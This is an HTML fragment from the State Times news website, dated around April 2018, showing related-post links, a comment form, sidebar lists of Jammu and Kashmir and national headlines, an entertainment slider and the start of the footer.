			                        <a href="http://news.statetimes.in/rashtriya-karyakarini-baithak-of-bharat-rakhsha-manch-held-at-jammu/"><img src="http://news.statetimes.in/wp-content/uploads/2018/04/bharat-Rakhsha-Manch-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/04/bharat-Rakhsha-Manch-610x354.jpg" alt="Rashtriya Karyakarini Baithak of Bharat Rakhsha Manch held at Jammu"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/rashtriya-karyakarini-baithak-of-bharat-rakhsha-manch-held-at-jammu/">Rashtriya Karyakarini Baithak of Bharat Rakhsha Manch held at Jammu</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-04-01T14:04:56+00:00">April 01, 2018</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/haryana-manipur-lift-titles-jk-bags-runners-up-trophy-in-sanshou-event/"><img src="http://news.statetimes.in/wp-content/uploads/2018/04/lead-strip-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/04/lead-strip.jpg" alt="Haryana, Manipur lift titles; J&K bags runners-up trophy in Sanshou event"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/haryana-manipur-lift-titles-jk-bags-runners-up-trophy-in-sanshou-event/">Haryana, Manipur lift titles; J&#038;K bags runners-up trophy in Sanshou event</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2018-04-01T01:11:14+00:00">April 01, 2018</time>
			</div>
                </li>

</ul>
</div>

<div id="comments" class="comments-area">

	
		
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/lawyers-annual-sports-meet-2018-concludes/#respond" style="display:none;">Cancel Reply</a></small></h3>			<form action="http://news.statetimes.in/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><textarea id="comment" placeholder="Comment..." name="comment" cols="45" rows="8" aria-required="true"></textarea></p><input id="author" name="author" type="text" placeholder="Name (required)" value="" size="30" aria-required='true' />
<input id="email" name="email" type="text" placeholder="Email (required)" value="" size="30" aria-required='true' />
<input id="url" name="url" type="text" placeholder="Website" value="" size="30" />
<p class="form-submit"><input name="submit" type="submit" id="submit-comment" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='345760' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="d9aa4f0b4e" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="234"/></p>			</form>
			</div><!-- #respond -->
	
</div><!-- #comments .comments-area -->
            </div> <!--main column-->
                      <div class="sidebar secondary-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-posts_list"><div class="widget-head"><h3 class="widget-title"><span>Latest News</span></h3></div>		<ul>
		
			<li><a href="http://news.statetimes.in/mobile-internet-services-suspended-in-kashmir-valley/">Mobile internet services suspended in Kashmir Valley</a></li>

			
			<li><a href="http://news.statetimes.in/bjym-supports-up-govt-move-to-introduce-ramji-as-middle-name-of-ambedkar/">BJYM supports UP govt move to introduce &#8216;Ramji&#8217; as middle name of Ambedkar</a></li>

			
			<li><a href="http://news.statetimes.in/joint-press-conference-by-aarakshan-virodhi-party-and-general-category-peoples-forum/">Joint press conference by Aarakshan Virodhi Party and General Category People&#8217;s Forum</a></li>

			
			<li><a href="http://news.statetimes.in/cag-raps-guj-over-lacunae-in-regulation-of-fishing-activities/">CAG raps Guj over lacunae in regulation of fishing activities</a></li>

			
			<li><a href="http://news.statetimes.in/rashtriya-karyakarini-baithak-of-bharat-rakhsha-manch-held-at-jammu/">Rashtriya Karyakarini Baithak of Bharat Rakhsha Manch held at Jammu</a></li>

			
			<li><a href="http://news.statetimes.in/communication-with-gsat-6a-lost/">Communication with GSAT-6A lost</a></li>

			
			<li><a href="http://news.statetimes.in/riot-accused-union-ministers-son-arrested-in-patna/">Riot accused union minister&#8217;s son arrested in Patna</a></li>

			
			<li><a href="http://news.statetimes.in/cbec-sanctions-rs-12700-cr-gst-refund-claims/">CBEC sanctions Rs 12,700-cr GST refund claims</a></li>

			
			<li><a href="http://news.statetimes.in/petrol-price-hits-4-yr-high-diesel-at-highest-level/">Petrol price hits 4-yr high, diesel at highest level</a></li>

			
			<li><a href="http://news.statetimes.in/mp-tendulkar-donates-his-salary-to-pms-relief-fund/">MP Tendulkar donates his salary to PM&#8217;s Relief Fund</a></li>

			
			<li><a href="http://news.statetimes.in/eight-militants-killed-in-south-kashmir-encounters/">Eight militants killed in south Kashmir encounters</a></li>

			
			<li><a href="http://news.statetimes.in/cbse-paper-leak-two-teachers-among-three-persons-arrested-says-police/">CBSE paper leak: Two teachers among three persons arrested, says police</a></li>

			
			<li><a href="http://news.statetimes.in/amitabh-bachchan-praises-irrfans-blackmail/">Amitabh Bachchan praises Irrfan&#8217;s &#8216;Blackmail&#8217;</a></li>

			
			<li><a href="http://news.statetimes.in/haryana-manipur-lift-titles-jk-bags-runners-up-trophy-in-sanshou-event/">Haryana, Manipur lift titles; J&#038;K bags runners-up trophy in Sanshou event</a></li>

			
			<li><a href="http://news.statetimes.in/spl-dgp-inaugurates-computerised-budgeting-system/">Spl DGP inaugurates Computerised Budgeting System</a></li>

											</ul>
</div>
            </div> <!--main sidebar-->
            <div class="clear"></div>
            <div class="clear"></div>
</div> <!--main container-->            
            <div class="sidebar main-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-ads">		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="4677" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- sidebar one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:250px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="5446915816"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
</div><div class="widget widget_momizattabber">                        <div class="main_tabs">
                            <ul class="tabs"></ul>
                            <div class="tabs-content-wrap">
                                <div class="tab-content"><a href="#" class="mom-tw-title">Top Stories</a>                                   <div class="mom-posts-widget">

					<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/army-chief-reviews-security-situation-along-loc/"><img src="http://news.statetimes.in/wp-content/uploads/2018/04/ARMY-CHIEF-VISITS-NORTHERN-COMMAND-1-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/04/ARMY-CHIEF-VISITS-NORTHERN-COMMAND-1-90x60.jpg" alt="Army Chief reviews security situation along LoC" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/army-chief-reviews-security-situation-along-loc/"><img src="http://news.statetimes.in/wp-content/uploads/2018/04/ARMY-CHIEF-VISITS-NORTHERN-COMMAND-1-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/04/ARMY-CHIEF-VISITS-NORTHERN-COMMAND-1-180x120.jpg" alt="Army Chief reviews security situation along LoC" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/army-chief-reviews-security-situation-along-loc/">Army Chief reviews security situation along LoC</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-04-01T01:23:11+00:00" class="entry-date">April 01, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/with-eye-on-polls-pradesh-bjp-may-revert-to-abandoned-core-issues/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="With eye on polls, Pradesh BJP may revert to ‘abandoned’ core issues" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/with-eye-on-polls-pradesh-bjp-may-revert-to-abandoned-core-issues/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="With eye on polls, Pradesh BJP may revert to ‘abandoned’ core issues" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/with-eye-on-polls-pradesh-bjp-may-revert-to-abandoned-core-issues/">With eye on polls, Pradesh BJP may revert to ‘abandoned’ core issues</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-04-01T01:23:08+00:00" class="entry-date">April 01, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/74-inspectors-transferred-five-detached/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="74 Inspectors transferred, five detached" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/74-inspectors-transferred-five-detached/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="74 Inspectors transferred, five detached" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/74-inspectors-transferred-five-detached/">74 Inspectors transferred, five detached</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-04-01T01:22:49+00:00" class="entry-date">April 01, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/initiate-dialogue-with-pak-mehbooba-urges-pm/"><img src="http://news.statetimes.in/wp-content/uploads/2018/04/CM-31-2-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/04/CM-31-2-90x60.jpg" alt="Initiate dialogue with Pak Mehbooba urges PM" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/initiate-dialogue-with-pak-mehbooba-urges-pm/"><img src="http://news.statetimes.in/wp-content/uploads/2018/04/CM-31-2-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/04/CM-31-2-180x120.jpg" alt="Initiate dialogue with Pak Mehbooba urges PM" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/initiate-dialogue-with-pak-mehbooba-urges-pm/">Initiate dialogue with Pak Mehbooba urges PM</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-04-01T01:22:22+00:00" class="entry-date">April 01, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/class-12-hindi-paper-circulating-on-social-media-fake-cbse/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Class 12 Hindi paper circulating on social media fake: CBSE" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/class-12-hindi-paper-circulating-on-social-media-fake-cbse/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Class 12 Hindi paper circulating on social media fake: CBSE" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/class-12-hindi-paper-circulating-on-social-media-fake-cbse/">Class 12 Hindi paper circulating on social media fake: CBSE</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-04-01T01:22:00+00:00" class="entry-date">April 01, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/paper-leak-plea-in-sc-against-cbse-move-to-conduct-re-exams/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Paper leak: Plea in SC against CBSE move to conduct re-exams" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/paper-leak-plea-in-sc-against-cbse-move-to-conduct-re-exams/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Paper leak: Plea in SC against CBSE move to conduct re-exams" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/paper-leak-plea-in-sc-against-cbse-move-to-conduct-re-exams/">Paper leak: Plea in SC against CBSE move to conduct re-exams</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-04-01T01:21:20+00:00" class="entry-date">April 01, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/e-way-bill-validity-to-begin-from-the-date-transporter-fills-up-details/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="‘E-way bill validity to begin from the date transporter fills up details’" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/e-way-bill-validity-to-begin-from-the-date-transporter-fills-up-details/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="‘E-way bill validity to begin from the date transporter fills up details’" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/e-way-bill-validity-to-begin-from-the-date-transporter-fills-up-details/">‘E-way bill validity to begin from the date transporter fills up details’</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-04-01T01:21:02+00:00" class="entry-date">April 01, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/three-doctors-20-para-medics-suspended-in-jammu/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Three doctors, 20 para-medics suspended in Jammu" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/three-doctors-20-para-medics-suspended-in-jammu/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Three doctors, 20 para-medics suspended in Jammu" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/three-doctors-20-para-medics-suspended-in-jammu/">Three doctors, 20 para-medics suspended in Jammu</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-04-01T01:20:59+00:00" class="entry-date">April 01, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/over-100-successful-operations-failed-to-get-him-a-job-in-jk-police/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Over 100 successful operations failed to get him a job in J&K Police" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/over-100-successful-operations-failed-to-get-him-a-job-in-jk-police/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Over 100 successful operations failed to get him a job in J&K Police" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/over-100-successful-operations-failed-to-get-him-a-job-in-jk-police/">Over 100 successful operations failed to get him a job in J&#038;K Police</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-04-01T01:20:46+00:00" class="entry-date">April 01, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/pilot-of-ia-flight-hijacked-to-pakistan-in-1971-passes-away/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Pilot of IA flight hijacked to Pakistan in 1971 passes away" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/pilot-of-ia-flight-hijacked-to-pakistan-in-1971-passes-away/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Pilot of IA flight hijacked to Pakistan in 1971 passes away" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/pilot-of-ia-flight-hijacked-to-pakistan-in-1971-passes-away/">Pilot of IA flight hijacked to Pakistan in 1971 passes away</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-04-01T01:20:30+00:00" class="entry-date">April 01, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/five-pwd-ses-placed-as-chief-engineers/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Five PWD SEs placed as Chief Engineers" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/five-pwd-ses-placed-as-chief-engineers/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Five PWD SEs placed as Chief Engineers" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/five-pwd-ses-placed-as-chief-engineers/">Five PWD SEs placed as Chief Engineers</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-03-31T23:36:41+00:00" class="entry-date">March 31, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/hc-rejects-plea-for-deferring-trial-in-ett-scam/"><img src="http://news.statetimes.in/wp-content/uploads/2017/08/2005-cash-for-question-scam-11-former-MPs-to-be-put-on-trial-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2017/08/2005-cash-for-question-scam-11-former-MPs-to-be-put-on-trial-90x60.jpg" alt="HC rejects plea for deferring trial in ETT scam" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/hc-rejects-plea-for-deferring-trial-in-ett-scam/"><img src="http://news.statetimes.in/wp-content/uploads/2017/08/2005-cash-for-question-scam-11-former-MPs-to-be-put-on-trial-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2017/08/2005-cash-for-question-scam-11-former-MPs-to-be-put-on-trial-180x120.jpg" alt="HC rejects plea for deferring trial in ETT scam" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/hc-rejects-plea-for-deferring-trial-in-ett-scam/">HC rejects plea for deferring trial in ETT scam</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-03-31T23:24:17+00:00" class="entry-date">March 31, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/may-have-limited-confrontation-with-pak-in-april-bsf/"><img src="http://news.statetimes.in/wp-content/uploads/2018/03/DG-BSF-K-K-Sharma-addressing-Press-Conference-at-BSF-Campus-Paloura-Jammu-3-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/03/DG-BSF-K-K-Sharma-addressing-Press-Conference-at-BSF-Campus-Paloura-Jammu-3-90x60.jpg" alt="May have limited confrontation with Pak in April: BSF" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/may-have-limited-confrontation-with-pak-in-april-bsf/"><img src="http://news.statetimes.in/wp-content/uploads/2018/03/DG-BSF-K-K-Sharma-addressing-Press-Conference-at-BSF-Campus-Paloura-Jammu-3-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/03/DG-BSF-K-K-Sharma-addressing-Press-Conference-at-BSF-Campus-Paloura-Jammu-3-180x120.jpg" alt="May have limited confrontation with Pak in April: BSF" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/may-have-limited-confrontation-with-pak-in-april-bsf/">May have limited confrontation with Pak in April: BSF</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2018-03-31T00:50:27+00:00" class="entry-date">March 31, 2018</span>
			    			    </div>
			</div>
			</div> <!--//post-->

									                                    </div>
</div><div class="tab-content"><a href="#" class="mom-tw-title">Cities n Towns</a>		<ul>
		
			<li><a href="http://news.statetimes.in/joint-press-conference-by-aarakshan-virodhi-party-and-general-category-peoples-forum/">Joint press conference by Aarakshan Virodhi Party and General Category People&#8217;s Forum</a></li>

			
			<li><a href="http://news.statetimes.in/abvp-activists-protest-against-cbse-chairperson-anita-karwal/">ABVP activists protest against CBSE chairperson Anita Karwal</a></li>

			
			<li><a href="http://news.statetimes.in/rashtriya-karyakarini-baithak-of-bharat-rakhsha-manch-held-at-jammu/">Rashtriya Karyakarini Baithak of Bharat Rakhsha Manch held at Jammu</a></li>

			
			<li><a href="http://news.statetimes.in/eight-militants-killed-in-south-kashmir-encounters/">Eight militants killed in south Kashmir encounters</a></li>

			
			<li><a href="http://news.statetimes.in/dps-leh-introduces-no-bag-day-for-pre-primary-wing/">DPS Leh introduces No Bag Day for Pre-Primary Wing</a></li>

			
			<li><a href="http://news.statetimes.in/farewell-given-to-retiring-officers/">Farewell given to retiring officers</a></li>

			
			<li><a href="http://news.statetimes.in/madhu-param-hans-delivers-religious-sermons-2/">Madhu Param Hans delivers religious sermons</a></li>

			
			<li><a href="http://news.statetimes.in/darsoo-residents-protest-against-phe-deptt/">Darsoo residents protest against PHE Deptt</a></li>

			
			<li><a href="http://news.statetimes.in/farooq-omar-condole-demise-of-mother-of-satwant-kour-dogra/">Farooq, Omar condole demise of mother of Satwant Kour Dogra</a></li>

			
			<li><a href="http://news.statetimes.in/kavinder-distributes-rs-7-38-lakh-aid-to-smas-nfbs-beneficiaries/">Kavinder distributes Rs 7.38 lakh  aid to SMAS, NFBS beneficiaries</a></li>

			
			<li><a href="http://news.statetimes.in/director-cad-mourns-demise-of-district-sms/">Director CAD mourns demise of District SMS</a></li>

			
			<li><a href="http://news.statetimes.in/kidnapped-girl-recovered-accused-held-4/">Kidnapped girl recovered, accused held</a></li>

			
			<li><a href="http://news.statetimes.in/sc-st-bc-dev-corp-releases-documentary-on-its-success-stories/">SC, ST, BC Dev Corp releases documentary on its success stories</a></li>

			
			<li><a href="http://news.statetimes.in/anjuman-e-imamia-hosts-difa-e-wilayat/">Anjuman-e-Imamia hosts &#8216;Difa-e-Wilayat&#8217;</a></li>

			
			<li><a href="http://news.statetimes.in/newly-married-woman-goes-missing/">Newly married woman goes missing</a></li>

			
			<li><a href="http://news.statetimes.in/woman-among-two-held-with-166-liquor-pouches/">Woman among two held with 166 liquor pouches</a></li>

											</ul>
</div>                            </div>
                        </div> <!--main tabs-->

            </div><div class="widget momizat-posts_slider"><div class="widget-head"><h3 class="widget-title"><span>Entertainment n Lifestyle</span></h3></div>			<script>
			jQuery(document).ready(function ($) {
				jQuery('.mpsw-slider').flexslider({
					animation : 'slide',
					controlNav: false,
					smoothHeight: true,
					prevText: '',
					nextText: '',
					slideshow: 1,
					slideshowSpeed: 4000,
				});
			});
			</script>
			<div class="mom-posts-slide-widget type-">
                            <div class="mpsw-slider">
                              <ul class="slides">
											<li>
			<a href="http://news.statetimes.in/amitabh-bachchan-praises-irrfans-blackmail/"><img src="http://news.statetimes.in/wp-content/uploads/2017/11/IFFI-personality-of-the-year-award-for-Amitabh-Bachchan-265x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2017/11/IFFI-personality-of-the-year-award-for-Amitabh-Bachchan-265x168.jpg" alt="Amitabh Bachchan praises Irrfan's 'Blackmail'" width="265" height="168">			  <p class="slide-caption">Amitabh Bachchan praises Irrfan&#8217;s &#8216;Blackmail&#8217;</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/baaghi-2-mints-rs-25-10-crore-on-day-one/"><img src="http://news.statetimes.in/wp-content/uploads/2018/01/Baaghi-2-gets-March-30-release-265x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/01/Baaghi-2-gets-March-30-release-265x168.jpg" alt="'Baaghi 2' mints Rs 25.10 crore on day one" width="265" height="168">			  <p class="slide-caption">&#8216;Baaghi 2&#8217; mints Rs 25.10 crore on day one</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/kamal-haasan-christopher-nolan-bond-over-movies/"><img src="http://news.statetimes.in/wp-content/uploads/2018/03/Kamal-Haasan-Christopher-Nolan-bond-over-movies-265x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/03/Kamal-Haasan-Christopher-Nolan-bond-over-movies-265x168.jpg" alt="Kamal Haasan, Christopher Nolan bond over movies" width="265" height="168">			  <p class="slide-caption">Kamal Haasan, Christopher Nolan bond over movies</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/sonam-to-consult-author-anuja-chauhan-on-her-the-zoya-factor-role/"><img src="http://news.statetimes.in/wp-content/uploads/2015/08/Sonam-Kapoor-opens-India-Bridal-Fashion-Week-2015-265x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2015/08/Sonam-Kapoor-opens-India-Bridal-Fashion-Week-2015-265x168.jpg" alt="Sonam to consult author Anuja Chauhan on her 'The Zoya Factor' role" width="265" height="168">			  <p class="slide-caption">Sonam to consult author Anuja Chauhan on her &#8216;The Zoya Factor&#8217; role</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/i-am-growing-up-very-fast-into-a-child-shah-rukh-on-zero/"><img src="http://news.statetimes.in/wp-content/uploads/2018/03/I-am-growing-up-very-fast-into-a-child-Shah-Rukh-on-Zero-265x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/03/I-am-growing-up-very-fast-into-a-child-Shah-Rukh-on-Zero-265x168.jpg" alt="I am growing up very fast into a child: Shah Rukh on 'Zero'" width="265" height="168">			  <p class="slide-caption">I am growing up very fast into a child: Shah Rukh on &#8216;Zero&#8217;</p>
			  </a>
			</li>
															                              </ul>
                            </div>
                        </div>

</div>
           </div> <!--main sidebar-->
            <div class="clear"></div>                      </div> <!--main inner-->
            
      </div> <!--content boxed wrapper-->
                        <footer id="footer">
                <div class="inner">
	     			<div class="one_fourth">
		<div class="widget momizat-social_counter"><div class="widget-head"><h3 class="widget-title"><span>Socials Counter</span></h3></div>
                        <div class="mom-socials-counter">
                            <ul>
                                                                    <li class="msc-item msc-rss">
                                        <a href="http://news.statetimes.in/feed/"><div class="sc-head">
                                            <i class="fa-icon-rss"></i>
                                            <span>RSS</span>
                                        </div>
                                        </a>
                                        <div class="sc-count">
                                            <span>1000+</span>
                                            Subscribers                                        </div>
                                    </li>
                                
                                
                                                                <li class="msc-item msc-twitter">
                                    <a href="http://twitter.com/@state_times" target="_blank">
                                    <div class="sc-head">
                                        <i class="fa-icon-twitter"></i>
                                        <span>twitter</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>1207</span>
                                        followers                                    </div>
                                </li>
                                
                                                                <li class="msc-item msc-googlePlus">
